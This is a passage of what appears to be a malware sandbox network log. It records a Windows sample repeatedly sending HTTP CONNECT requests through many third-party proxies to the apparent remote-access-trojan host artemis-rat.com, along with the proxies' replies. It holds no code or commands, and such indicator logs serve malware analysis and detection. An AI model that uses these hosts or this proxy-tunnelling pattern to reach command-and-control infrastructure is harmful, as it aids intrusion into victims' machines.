                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.069483995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.070121050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:26.069730997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.069708109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:34.054028034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:42.069727898 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:57.866228104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              337192.168.2.45096393.90.212.241537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.391311884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              338192.168.2.45093035.154.71.7210807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.396363974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.790781021 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              339192.168.2.45016324.249.199.1241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.404834986 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              340192.168.2.450079146.59.18.246409757284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.406589985 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.422832966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.435473919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              341192.168.2.451007134.209.189.42807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.410774946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.705506086 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              342192.168.2.450990186.125.218.1539997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.411647081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.823538065 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              343192.168.2.4501238.218.100.12080807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.413558960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.728035927 CET309INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.24.0
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 157
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              344192.168.2.45099694.131.14.6610817284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.413686037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              345192.168.2.45104051.75.126.150365807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.421977997 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              346192.168.2.45102493.190.141.102478517284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.451426983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.748399973 CET226INHTTP/1.1 403 Forbidden
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Length: 101
                                              Content-Type: text/plain; charset=utf-8
                                              Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 65 36 39 34 64 34 34 37 65 39 64 33 32 38 34 32 37 31 38 38 66 37 33 33 62 31 34 62 36 39 38 35 0d 0a
                                              Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/e694d447e9d328427188f733b14b6985


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              347192.168.2.45100480.92.227.18556787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.451747894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              348192.168.2.451057172.67.242.194807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.451751947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.610677004 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              349192.168.2.450455107.181.168.14541457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.453160048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              350192.168.2.45100645.231.29.7541537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.456973076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              351192.168.2.451074104.23.126.8807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.467112064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.625195026 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              352192.168.2.450741112.5.33.1799997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.468775034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              353192.168.2.451078159.65.77.16885857284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.493168116 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              354192.168.2.4507518.213.128.9077797284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.516266108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.849178076 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              355192.168.2.45105072.210.252.13741457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.525790930 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              356192.168.2.45105272.206.181.10341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.533324957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              357192.168.2.45105572.210.208.10141457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.539961100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              358192.168.2.451096172.67.181.103807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.546559095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.704340935 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              359192.168.2.45020937.220.139.21980807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.546721935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.413081884 CET19INHTTP/1.1 200 OK


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              360192.168.2.451039200.43.231.441537284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.550591946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              361192.168.2.451036114.132.202.12580807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.564265013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.133609056 CET84INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Transfer-Encoding: chunked


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              362192.168.2.45106868.1.210.16341457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.564682007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              363192.168.2.45107572.195.34.4241457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.581847906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              364192.168.2.4510863.90.100.1231287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.582302094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.802038908 CET116INHTTP/1.1 200 OK
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Server: nginx
                                              Content-Type: text/plain
                                              Content-Length: 0


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              365192.168.2.45108538.162.0.3631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.583051920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.324110985 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              366192.168.2.45104247.243.205.131287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.586229086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:18.919759989 CET59INHTTP/1.1 200 Connection Established
                                              Proxy-agent: nginx


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              367192.168.2.450342162.214.225.223550297284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.589627028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.663132906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.663737059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
